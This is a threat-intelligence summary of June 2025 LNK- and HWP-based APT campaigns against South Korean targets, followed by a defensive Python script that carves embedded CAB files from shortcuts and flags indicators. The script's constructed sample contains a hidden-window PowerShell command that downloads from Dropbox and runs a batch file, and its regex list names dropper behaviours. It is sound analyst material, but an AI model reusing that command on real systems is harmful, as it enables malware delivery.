June 2025 APT Attack Trends Report (Domestic)
2025-07-10 • AhnLab • Cyber threat report on LNK
AhnLab’s June 2025 monitoring of APT activity against South Korean targets found that spear phishing remained the dominant initial-access method. LNK (Windows shortcut) delivery accounted for the largest share of observed cases, and HWP (Hangul word processor) based attacks increased from the previous month.

In one observed LNK pattern, the shortcut launches PowerShell, which extracts a CAB archive and decoy document data embedded in the shortcut file itself, opens the decoy, and unpacks .bat, .ps1, and .vbs scripts from the CAB; those scripts collect information about the victim PC and download additional malware. Lures included cryptocurrency exchange account notices, bank transaction explanations, tax-related documents, crypto receipt forms, and resume-themed files.

In a second LNK-driven pattern, the shortcut arrives inside a compressed archive alongside benign decoy files. Its scripts use the Dropbox API or Google Drive to fetch payloads, then write further scripts and obfuscated RAT files to locations such as %PUBLIC%. The final RAT payloads included XenoRAT and RoKRAT, giving the attacker capabilities such as keylogging and screen capture.
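The two LNK patterns above share a triage signature: an oversized shortcut that carries a PowerShell command line, a CAB payload appended after the shortcut structure, and strings pointing at cloud-storage download endpoints or a drop directory such as %PUBLIC%. The script below is an added example (not code from the AhnLab report) of how an analyst can carve the embedded CAB and flag those indicators offline. The LNK header check (size 0x4C plus the ShellLink CLSID) and the CAB header layout (cbCabinet at offset 8, version bytes 03 01 at offset 24) are from the public file-format specifications; the indicator regexes, the 10 KB size threshold, and the sample bytes are assumptions constructed to mirror the described behaviour, not a real sample.

```python
"""Offline triage of a suspected LNK dropper: carve embedded CAB files and
score suspicious strings. Added example; sample data is constructed."""
import re
import struct

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # ShellLink CLSID, on-disk order
CAB_MAGIC = b"MSCF"
CAB_HEADER_LEN = 36
OVERSIZE_BYTES = 10 * 1024  # assumption: ordinary shortcuts are a few KB at most

# Assumed indicator set, chosen to match the patterns described in the report.
INDICATORS = {
    "powershell":    re.compile(r"powershell", re.I),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "bypass_policy": re.compile(r"-e(?:xecutionpolicy|p)\s+bypass", re.I),
    "cab_expand":    re.compile(r"\bexpand(?:\.exe)?\b", re.I),
    "dropbox_api":   re.compile(r"(?:api|content)\.dropboxapi\.com", re.I),
    "google_drive":  re.compile(r"drive\.google\.com|googleapis\.com", re.I),
    "public_dir":    re.compile(r"%PUBLIC%|\$env:PUBLIC|\\Users\\Public", re.I),
    "script_drop":   re.compile(r"\.(?:bat|ps1|vbs)\b", re.I),
}


def is_lnk(data: bytes) -> bool:
    """True if the file starts with a well-formed ShellLinkHeader."""
    return (len(data) >= LNK_HEADER_SIZE
            and struct.unpack_from("<I", data, 0)[0] == LNK_HEADER_SIZE
            and data[4:20] == LNK_CLSID)


def utf16_strings(data: bytes, min_chars: int = 6) -> list[str]:
    """Recover printable UTF-16LE runs; LNK stores its argument string this way."""
    pattern = rb"(?:[\x20-\x7e]\x00){%d,}" % min_chars
    return [m.group().decode("utf-16-le") for m in re.finditer(pattern, data)]


def find_indicators(data: bytes) -> dict[str, bool]:
    """Run the indicator regexes over both the raw bytes and the decoded UTF-16 strings."""
    haystack = data.decode("latin-1") + "\n" + "\n".join(utf16_strings(data))
    return {name: bool(rx.search(haystack)) for name, rx in INDICATORS.items()}


def carve_cabs(data: bytes) -> list[tuple[int, bytes]]:
    """Carve every embedded CAB using cbCabinet (CFHEADER offset 8) as the length."""
    cabs = []
    pos = data.find(CAB_MAGIC)
    while pos != -1:
        if pos + CAB_HEADER_LEN <= len(data) and data[pos + 24:pos + 26] == b"\x03\x01":
            size = struct.unpack_from("<I", data, pos + 8)[0]
            if CAB_HEADER_LEN <= size <= len(data) - pos:
                cabs.append((pos, data[pos:pos + size]))
        pos = data.find(CAB_MAGIC, pos + 4)
    return cabs


def triage(data: bytes) -> dict:
    """Summarise everything an analyst wants before detonating the file."""
    return {
        "valid_lnk_header": is_lnk(data),
        "size": len(data),
        "oversized": len(data) > OVERSIZE_BYTES,
        "indicators": find_indicators(data),
        "cabs": [(offset, len(blob)) for offset, blob in carve_cabs(data)],
    }


def build_sample() -> bytes:
    """Constructed LNK-like blob imitating the described layout (not a real sample)."""
    header = struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + b"\x00" * (LNK_HEADER_SIZE - 20)
    # Hypothetical command line, written as UTF-16LE like a real LNK argument string.
    cmd = ('powershell.exe -w hidden -ep bypass -c "expand $env:PUBLIC\\pay.cab '
           '$env:PUBLIC; iwr https://content.dropboxapi.com/2/files/download; '
           'start $env:PUBLIC\\run.bat"').encode("utf-16-le")
    body = b"\x01" * 100  # stand-in for CFFOLDER/CFFILE/CFDATA records
    cab = (CAB_MAGIC + b"\x00" * 4 + struct.pack("<I", CAB_HEADER_LEN + len(body))
           + b"\x00" * 4 + struct.pack("<I", CAB_HEADER_LEN) + b"\x00" * 4
           + b"\x03\x01" + struct.pack("<HHHHH", 1, 1, 0, 0, 0) + body)
    return header + cmd + b"\x00" * 64 + cab + b"decoy document bytes follow"


if __name__ == "__main__":
    print(triage(build_sample()))
```

On a real case, replace `build_sample()` with the bytes of the quarantined .lnk; each carved CAB can be written to disk and expanded (`expand.exe` on Windows, `cabextract` elsewhere) to recover the .bat/.ps1/.vbs stages without running the shortcut.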